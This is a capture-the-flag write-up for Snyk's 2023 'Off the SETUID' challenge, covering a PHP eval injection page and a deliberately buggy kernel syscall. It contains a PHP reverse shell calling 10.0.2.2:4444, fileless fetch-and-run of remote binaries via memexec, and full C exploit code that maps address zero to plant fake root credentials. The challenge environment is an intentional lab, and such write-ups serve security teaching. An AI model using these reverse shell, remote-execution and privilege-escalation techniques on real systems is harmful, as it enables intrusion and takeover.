Snyk Fetch the Flag CTF 2023 writeup: Off the SETUID

Written by:

Carlos Polop

Yago Gutiérrez

November 30, 2023

0 mins read

Thanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. If you were at Snyk’s 2023 Fetch the Flag and are looking for the answer to the Off the SETUID challenge, you’ve come to the right place. Let’s walk through the solution together!

You find yourself in an unfamiliar environment. Can you live off the land? Or, can you just live...

Retrieve the flag out of the root user's home directory.

This is a weird one. Is it a web challenge or a kernel pwn one?

We have a qemu script, a compiled kernel (with its respective .diff), and an initramfs image (along with the code for the init program). For starters, we can just decompress the initramfs and take a look inside.

To distro or not to distro

$ zstdcat -d - < ../initramfs.img | cpio -i
172272 bloques
$ ls -l
total 48
lrwxrwxrwx 1 arget arget     8 oct 30 22:00 bin -> usr/bin/
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 dev
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 etc
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 home
-rwxr-xr-x 1 arget arget 16264 oct 30 22:00 init
lrwxrwxrwx 1 arget arget     8 oct 30 22:00 lib64 -> /usr/lib
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 proc
drwx------ 2 arget arget  4096 oct 30 22:00 root
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 sys
drwxr-xr-x 4 arget arget  4096 oct 30 22:00 usr
drwxr-xr-x 3 arget arget  4096 oct 30 22:00 var
$ ls usr/bin/
php
$ ls -l root/flag.txt 
-r-------- 1 arget arget 25 oct 30 22:00 root/flag.txt

Alright, distro-less. No shell, no common utilities, no nothing. The init program is obviously compiled (there's no shell so it can't be a script), but we have its source code too:

// [Definition of add_dev_addr() and default_gw()]
int main()
{
	mknod("/dev/null" , 0666 | S_IFCHR, makedev(1, 3));
	mknod("/dev/ttyS0", 0660 | S_IFCHR, makedev(4, 64));

	mount("proc", "/proc", "proc" , MS_NOEXEC | MS_NODEV | MS_NOSUID, NULL);
	mount("sysfs", "/sys", "sysfs", MS_NOEXEC | MS_NODEV | MS_NOSUID, NULL);
	mount(NULL, "/", NULL, MS_REMOUNT | MS_RDONLY, NULL);

	int fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
	add_dev_addr(fd, "10.0.2.15", "255.255.255.0");
	default_gw(fd, inet_addr("10.0.2.2"));
	close(fd);

	if (!fork())
	{
		setresuid(100, 100, 100);
		chdir("/var/run");
		execl("/usr/bin/php", "php", "-S", "0:8080", NULL);
		err(1, "Something failed");
	}
	wait(NULL);

	reboot(RB_POWER_OFF);
}

It does the typical things an init script does: initialize some devices, mount the procfs and sysfs (with noexec), and remount the rootfs as read-only and initialize the network. Then starts an HTTP server listening on port 8080 with root directory in /var/run as user with uid=100.

In /var/run, there's just an index.php:

// [CSS stuff]
<h2>Super Secure PHP Code Evaluator</h2>
<div class="container">
    <form method="post">
        <input type="text" name="code" placeholder="Enter code" required>
        <br>
        <button type="submit">Eval Code</button>
    </form>
    <?php
    if ($_SERVER['REQUEST_METHOD'] == 'POST') {
        $code = $_POST['code'];
        eval($code);
    }
    ?>
</div>
<br><br><br>
<a href="?debug">Show Source Code</a>

<?php
if (isset($_GET['debug'])) {
    highlight_file(__FILE__);
}
?>

So, to recapitulate, we have an HTTP server very clearly vulnerable to PHP code injection, so we can use something like the following to obtain a reverse PHP interactive shell:

$s = fsockopen("10.0.2.2", 4444);
proc_open(['php', '-a'], array(0 => $s, 1 => $s, 2 => $s), $p);

But we can't read the flag since it is only readable by root. Therefore, we need to find a way to escalate privileges. Enter fun_setuid.diff.

fun_setuid()

In the .diff file we can see that a new syscall was added to the kernel:

struct cred* prepare_user_creds(kuid_t kuid)
{
	struct cred* new;
	long retval;
	if (!uid_valid(kuid))
		return NULL;

	new = prepare_creds();
	if (!new)
		return (struct cred*) -ENOMEM;

	new->uid   = kuid;
	retval = set_user(new);
	if (retval < 0)
		goto error;
	new->euid  = kuid;
	new->suid  = kuid;
	new->fsuid = kuid;

	retval = security_task_fix_setuid(new, current_cred(), LSM_SETID_RES);
	if (retval < 0)
		goto error;

	retval = set_cred_ucounts(new);
	if (retval < 0)
		goto error;

	flag_nproc_exceeded(new);
	return new;

error:
	abort_creds(new);
	return (struct cred*) retval;
}

long __sys_fun_setuid(uid_t uid)
{
	const struct cred* old;
	struct cred* new;
	kuid_t kuid = make_kuid(current_user_ns(), uid);

	old = current_cred();

	if (uid_lt(kuid, old->uid) &&
	    !ns_capable_setid(old->user_ns, CAP_SETUID))
		return -EPERM;

	new = prepare_user_creds(kuid);
	if (new < 0)
		return (long) new;

	return commit_creds(new);
}

SYSCALL_DEFINE1(fun_setuid, uid_t, uid)
{
	return __sys_fun_setuid(uid);
}

In short, this syscall allows a process to change its uid to another one as long as it is greater than the current one (or the process has the CAP_SETUID capability).

The syscall uses a helper function called prepare_user_creds() which in turn uses prepare_cred() to allocate a new struct cred, then edits it to be one of the new user, and returns it. If an error occurs, it returns the negated value of an error code which is why the syscall function checks that the returned value isn't negative before committing the credentials (see Design note below). It also checks that the requested uid isn't invalid (i. e. equal to -1), which in that case it returns NULL.

Design note

There are also two serious problems with this design:

Comparing an address in C with zero doesn't work. It just doesn't. Addresses are treated like an unsigned type, so checking if one is negative doesn't make sense, thus the compiler removes the if entirely.
Even if it wasn't removed by the compiler, the code still wouldn't work because in Linux on x86, kernel addresses are always negative, so even when prep_user_creds() doesn't find any problems, the struct cred* pointer returned by it would be interpreted as negative and wouldn't be committed.

Credentialism

The problem is that the syscall function doesn't check for this last possibility, and so it may commit a NULL pointer as the pointer to our credentials structure. After modifying the initramfs to add a busybox, we can execute sysctl vm.mmap_min_addr to see the minimum address a process can map on this system. If we were in need of further debugging, we have /proc/config.gz available too.

We can see that mmap_min_addr=0 and also that in the run.sh script, the vm doesn't have SMAP enabled... great! We can map the NULL address, place a credentials structure there for root and call fun_setuid(-1) to make our creds pointer point to NULL, i. e. our fake credentials.

#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <err.h>

#define __NR_fun_setuid 452
long fun_setuid(uid_t uid)
{
	return syscall(__NR_fun_setuid, uid);
}

struct cred
{
	int		usage;
	unsigned	uid;
	unsigned	gid;
	unsigned	suid;
	unsigned	sgid;
	unsigned	euid;
	unsigned	egid;
	unsigned	fsuid;
	unsigned	fsgid;
	unsigned	securebits;
	unsigned long	cap_inheritable;
	unsigned long	cap_permitted;
	unsigned long	cap_effective;
	unsigned long	cap_bset;
	unsigned long	cap_ambient;
	// ... pointers to stuff I don't care about
};

int main(int argc, char** argv)
{
	char buf[100];
	int fd;
	struct cred* cred = NULL;

	void* map = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
			MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
	if (map == MAP_FAILED)
		err(1, "mmap()");

	*cred = (struct cred) { 1, 0, 0, 0, 0, 0, 0, 0, -1, -1, -1, -1, -1 };

	printf("uid = %u\n", getuid());
	fun_setuid(-1);
	printf("uid = %u\n", getuid());

	fd = open("/root/flag.txt", O_RDONLY);
	write(0, buf, read(fd, buf, sizeof buf));
	close(fd);

	pause(); // If you don't look it isn't there :P
	return 0;

We don't really need to change the capabilities, but since we are here we can do it for extra points. But please note that it is very important to set cred->usage=1 (which is like a reference counter) or the kernel will think it is a UAF bug (BUG_ON(atomic_read(&new->usage) < 1)).

Also, we can't let this process end or the kernel will try to free this structure, and that wouldn't be healthy. That's why we can't spawn a shell (calling execve() ultimately does imply the demise of the current process), hence the pause() at the end.

But we still have a problem: we can't upload the exploit anywhere in order to be run. We can convert the exploit to shellcode and use PHP code to write to the PHP process' procfs mem file in order to achieve arbitrary native code execution, and from there mmap() NULL, place some fake credentials and call fun_setuid(-1), since we can't do any of this from PHP scripting…

But that just isn't cool enough.

Memexec

A few months ago, we gave a talk at DEFCON 31 about circumventing, under certain circumstances, distro-less environments. For this, I (Yago Gutiérrez) developed a tool called memexec which allows you to run any program you'd like filelessly on PHP.

Just paste in this interactive PHP session. From now on, you'll have a memexec() function which accepts two arguments: a URI to a binary and an array of arguments for the program. We can, for example, set an HTTP server with a busybox and execute commands inside the system:

php > memexec("http://10.0.2.2:8888/busybox", ["ls", "-la", "/"]);
memexec("http://10.0.2.2:8888/busybox", ["ls", "-la", "/"]);
total 16
drwxr-xr-x   10 root     root           260 Oct 24 22:42 .
drwxr-xr-x   10 root     root           260 Oct 24 22:42 ..
lrwxrwxrwx    1 root     root             8 Oct 24 22:31 bin -> usr/bin/
drwxr-xr-x    2 root     root           100 Oct 31 10:39 dev
drwxr-xr-x    2 root     root           120 Oct 24 22:53 etc
drwxr-xr-x    2 root     root            40 Oct 24 18:25 home
-rwxr-xr-x    1 root     root         16264 Oct 24 22:42 init
lrwxrwxrwx    1 root     root             8 Oct 24 18:25 lib64 -> /usr/lib
dr-xr-xr-x  102 root     root             0 Oct 31 10:39 proc
drwx------    2 root     root            60 Oct 24 18:25 root
dr-xr-xr-x   12 root     root             0 Oct 31 10:39 sys
drwxr-xr-x    4 root     root            80 Oct 24 18:25 usr
drwxr-xr-x    3 root     root            60 Oct 24 18:25 var
php > memexec("http://10.0.2.2:8888/busybox", ["mount"]);
memexec("http://10.0.2.2:8888/busybox", ["mount"]);
rootfs on / type rootfs (ro,size=94428k,nr_inodes=23607)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
php >

Important: There are no SSL libraries inside the vm, so be sure not to use HTTPS.

Alllllright let's exploit this kernel once and for all.

php > memexec("http://10.0.2.2:8888/x", []);
memexec("http://10.0.2.2:8888/x", []);
the flag will be here...

Thanks for making Fetch happen!

A huge thank you to all the teams in Fetch the Flag 2023! It was great seeing all of you there and you can always find us at @Arget (@arget13 on GH) and @carlospolop (@carlospop on GH too).

Here are the writeups for the other 2023 challenges. Dig in!

The developer security platform